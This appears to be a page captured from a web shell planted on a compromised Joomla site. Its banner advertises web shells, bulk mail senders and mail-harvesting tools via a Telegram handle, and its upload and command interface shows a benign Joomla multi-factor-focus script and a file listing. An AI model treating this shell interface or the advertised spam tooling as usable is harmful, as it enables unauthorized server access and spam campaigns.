__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright   (C) 2022 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

(() => {

  document.addEventListener('DOMContentLoaded', () => {
    const elCodeField = document.getElementById('users-mfa-code');
    const elValidateButton = document.getElementById('users-mfa-captive-button-submit');
    const elToolbarButton = document.getElementById('toolbar-user-mfa-submit')?.querySelector('button');

    // Focus the code field. If the code field is hidden, focus the submit button (useful e.g. for WebAuthn)
    if (elCodeField && elCodeField.style.display !== 'none' && !elCodeField.classList.contains('visually-hidden') && elCodeField.type !== 'hidden') {
      elCodeField.focus();
    } else {
      if (elValidateButton) {
        elValidateButton.focus();
      }
      if (elToolbarButton) {
        elToolbarButton.focus();
      }
    }

    // Capture the admin toolbar buttons, make them click the inline buttons
    document.querySelectorAll('.button-user-mfa-submit').forEach(elButton => {
      elButton.addEventListener('click', e => {
        e.preventDefault();
        elValidateButton.click();
      });
    });
    document.querySelectorAll('.button-user-mfa-logout').forEach(elButton => {
      elButton.addEventListener('click', e => {
        e.preventDefault();
        const elLogout = document.getElementById('users-mfa-captive-button-logout');
        if (elLogout) {
          elLogout.click();
        }
      });
    });
    document.querySelectorAll('.button-user-mfa-choose-another').forEach(elButton => {
      elButton.addEventListener('click', e => {
        e.preventDefault();
        const elChooseAnother = document.getElementById('users-mfa-captive-form-choose-another');
        if (elChooseAnother) {
          elChooseAnother.click();
        }
      });
    });
  });
})();

Filemanager

Name Type Size Permission Actions
admin-users-groups-es5.js File 965 B 0664
admin-users-groups-es5.min.js File 597 B 0664
admin-users-groups-es5.min.js.gz File 436 B 0664
admin-users-groups.js File 857 B 0664
admin-users-groups.min.js File 554 B 0664
admin-users-groups.min.js.gz File 420 B 0664
admin-users-mail-es5.js File 1.34 KB 0664
admin-users-mail-es5.min.js File 945 B 0664
admin-users-mail-es5.min.js.gz File 497 B 0664
admin-users-mail.js File 1.22 KB 0664
admin-users-mail.min.js File 888 B 0664
admin-users-mail.min.js.gz File 474 B 0664
two-factor-focus-es5.js File 2.14 KB 0664
two-factor-focus-es5.min.js File 1.16 KB 0664
two-factor-focus-es5.min.js.gz File 495 B 0664
two-factor-focus.js File 1.87 KB 0664
two-factor-focus.min.js File 1.05 KB 0664
two-factor-focus.min.js.gz File 460 B 0664
two-factor-list-es5.js File 655 B 0664
two-factor-list-es5.min.js File 500 B 0664
two-factor-list-es5.min.js.gz File 364 B 0664
two-factor-list.js File 559 B 0664
two-factor-list.min.js File 443 B 0664
two-factor-list.min.js.gz File 342 B 0664
Filemanager